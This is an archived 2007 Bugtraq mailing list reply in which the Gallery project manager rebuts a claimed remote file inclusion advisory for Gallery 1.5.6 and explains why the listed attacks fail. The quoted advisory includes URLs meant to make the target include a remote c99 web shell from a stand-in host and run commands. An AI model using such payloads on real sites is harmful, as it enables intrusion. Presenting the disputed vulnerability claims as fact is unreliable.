| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 24 Apr 2007 13:34:13 -0400 From: Chris Kelly <ckdake@...ake.com> To: s433d_only_linux@...oo.de Cc: bugtraq@...urityfocus.com, Gallery Project Core Team discussion list <gallery-core@...ts.sourceforge.net> Subject: Re: gallery >> 1.5.6 Remote File Inclusion Did you actually try any of these so called "explots"? As someone else pointed out, these aren't actually exploits. content.php is all functions and doesn't do anything when accessed directly, and there are explicit globals checks for all of the examples you give. If you actually bothered to try any of them (or look in the source code) you would see blank pages or messages such as "Direct Access to this location is not allowed." Also, it is appreciated if you contact the vendor first instead of publishing something to a disclosure mailing list. The address for this is easy to find and is: security@...lery.menalto.com Please do your research next time, and if you actually find a security problem, let us know so that we can release a patch for it and credit you on our website with the release announcement. thanks! -Chris Gallery Project Manager -- Chris Kelly ckdake@...ake.com http://ckdake.com/ On Apr 24, 2007, at 11:25 AM, s433d_only_linux@...oo.de wrote: > ###################################################################### > ################################################################ > #gallery >> 1.5.6 Remote File > Inclusion > # > #Affected Software : gallery >> > 1.5.6 > # > #Download..: http://sourceforge.net/project/downloading.php? > group_id=7130&use_mirror=heanet&filename=gallery-1.5.6.tar.gz&66134343 > # > #Risk ..............: > high > # > #Date .........: > 24/4/2007 > # > #Found by ..........: s433d_only_linux > (Dr.Linux) > # > #Contact ...........: > s433d_only_linux@...oo.de > # > #Web .............: > Www.hackerz.ir > # > ###################################################################### > ################################################################ > #Affected File: > gallery/lib/content.php > gallery/lib/content.php > gallery/lib/content.php > gallery/lib/content.php > gallery/setup/frame_test.php > gallery/contrib/joomla/admin.gallery.php > gallery/contrib/joomla/toolbar.gallery.php > gallery/contrib/mambo/admin.gallery.php > gallery/contrib/mambo/toolbar.gallery.php > gallery/contrib/phpBB2/modules.php > gallery/contrib/phpBB2/modules.php > gallery/contrib/phpBB2/modules.php > gallery/contrib/phpnuke/modules.php. > gallery/contrib/phpnuke/modules.php.patch > ###################################################################### > ################################################################## > # Exploit: > http://[target]/gallery/lib/content.php?include=http://shellseit/ > c99.txt?cmd=ls > gallery/lib/content.php?=http://shell/c99.txt?cmd=ls > gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls > gallery/lib/content.php?=http://shell/c99.txt?cmd=ls > gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/ > c99.txt?cmd=ls > gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/ > c99.txt?cmd=ls > # > # > ###################################################################### > #################################################################
Powered by blists - more mailing lists